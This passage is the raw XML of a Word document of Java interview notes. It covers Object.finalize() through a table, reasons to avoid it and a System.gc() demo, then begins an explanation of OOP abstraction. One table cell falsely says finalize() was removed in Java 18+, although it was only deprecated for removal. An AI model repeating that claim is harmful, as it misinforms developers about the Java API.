        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E7005" w:rsidRPr="00CE4B95" w14:paraId="46D00FBB" w14:textId="77777777" w:rsidTr="002E7005">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28155C5C" w14:textId="77777777" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="002E7005" w:rsidP="002E700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ined in</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5684FC4E" w14:textId="77777777" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="002E7005" w:rsidP="002E700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lang.Object class</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E7005" w:rsidRPr="00CE4B95" w14:paraId="1104E10B" w14:textId="77777777" w:rsidTr="002E7005">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36F85924" w14:textId="77777777" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="002E7005" w:rsidP="002E700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ignature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70809C9B" w14:textId="77777777" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="002E7005" w:rsidP="002E700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otected void finalize() throws Throwable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E7005" w:rsidRPr="00CE4B95" w14:paraId="0D1F0925" w14:textId="77777777" w:rsidTr="002E7005">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="033A2ADB" w14:textId="77777777" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="002E7005" w:rsidP="002E700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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="698ACE73" w14:textId="77777777" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="002E7005" w:rsidP="002E700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d to perform </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>cleanup</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> like closing files, network sockets, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E7005" w:rsidRPr="00CE4B95" w14:paraId="2CF9B229" w14:textId="77777777" w:rsidTr="002E7005">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AAE821E" w14:textId="77777777" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="002E7005" w:rsidP="002E700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anual call</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13C2A326" w14:textId="77777777" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="002E7005" w:rsidP="002E700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can call it explicitly, but it's </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>not recommended</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (obj.finalize() is just a method call, not GC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E7005" w:rsidRPr="00CE4B95" w14:paraId="2B890438" w14:textId="77777777" w:rsidTr="002E7005">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0234A212" w14:textId="77777777" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="002E7005" w:rsidP="002E700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nly once?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="383A317B" w14:textId="77777777" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="002E7005" w:rsidP="002E700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es — GC calls it </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>at most once</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> per object</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E7005" w:rsidRPr="00CE4B95" w14:paraId="12B1F4D1" w14:textId="77777777" w:rsidTr="002E7005">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42739C3B" w14:textId="77777777" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="002E7005" w:rsidP="002E700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precated?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="683D4CA3" w14:textId="77777777" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="002E7005" w:rsidP="002E7005">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Yes</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, deprecated in </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Java 9</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removed in Java 18+</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> because it's </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>unreliable and unpredictable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1CC330F5" w14:textId="77777777" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="002E7005" w:rsidP="002E700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y Not to Use finalize()?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0739DAEF" w14:textId="77777777" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="002E7005" w:rsidP="002E700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No guarantee </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>when or even if</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> it will be called.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5190B194" w14:textId="77777777" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="002E7005" w:rsidP="002E700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an lead to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resource leaks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if relied on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F961CB" w14:textId="77777777" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="002E7005" w:rsidP="002E700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tter alternatives</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>try-with-resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or explicitly close resources via close().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1C3655" w14:textId="77777777" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="002E7005" w:rsidP="002E700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77CF8788" w14:textId="77777777" w:rsidR="00B476C9" w:rsidRPr="00CE4B95"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Objec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F8F5D3F" w14:textId="77777777" w:rsidR="00B476C9" w:rsidRPr="00CE4B95"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69F92901" w14:textId="77777777" w:rsidR="00B476C9" w:rsidRPr="00CE4B95"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otecte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finaliz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row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owab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6A6F397" w14:textId="77777777" w:rsidR="00B476C9" w:rsidRPr="00CE4B95"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Finalize called!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDBB4BC" w14:textId="77777777" w:rsidR="00B476C9" w:rsidRPr="00CE4B95"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0B151B6" w14:textId="77777777" w:rsidR="00B476C9" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D987C8B" w14:textId="77777777" w:rsidR="00B476C9" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEEE0FF" w14:textId="77777777" w:rsidR="00B476C9" w:rsidRPr="00CE4B95"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i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03A8442" w14:textId="77777777" w:rsidR="00B476C9" w:rsidRPr="00CE4B95"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FF0A7D9" w14:textId="77777777" w:rsidR="00B476C9" w:rsidRPr="00CE4B95"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Object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> obj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Object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6421CC" w14:textId="77777777" w:rsidR="00B476C9" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        obj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p>
    <w:p w14:paraId="42717383" w14:textId="77777777" w:rsidR="00B476C9" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156951B8" w14:textId="77777777" w:rsidR="00B476C9" w:rsidRPr="00CE4B95"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uggests GC, not guaranteed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0470AD41" w14:textId="77777777" w:rsidR="00B476C9" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B34CEF" w14:textId="77777777" w:rsidR="00B476C9" w:rsidRPr="00CE4B95"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Main ends."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069B611E" w14:textId="77777777" w:rsidR="00B476C9" w:rsidRPr="00CE4B95"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2D88DC1" w14:textId="42D1ABC7" w:rsidR="00B476C9" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1F0CE9" w14:textId="77777777" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="002E7005" w:rsidP="002E700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utput may or may not show "Finalize called!" — because GC behavior is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-deterministic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AB6DBB" w14:textId="67BDD3F3" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>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6842CF8">
          <v:rect id="_x0000_i1295" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidR="002E7005" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="296725AB" w14:textId="0D9173A3" w:rsidR="00884A56" w:rsidRPr="00CE4B95" w:rsidRDefault="00884A56" w:rsidP="00884A56">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="106" w:name="_Toc196307586"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>OOPs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
    </w:p>
    <w:p w14:paraId="2BACE634" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="_Toc196307587"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain OOPs concept?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107"/>
    </w:p>
    <w:p w14:paraId="23083475" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="002465FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Object-Oriented Programming (OOPs) is a programming paradigm based on the concept of "objects", which can contain data and code. Java is a fully object-oriented language (except for primitive types) and supports the following core OOPs concepts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD11EA2" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="002465FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D90F42F" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="002465FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Abstraction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF485EA" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="002465FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hides internal implementation and shows only functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC24FDA" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="002465FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Achieved using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>abstract classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>interfaces</w:t>
      </w:r>
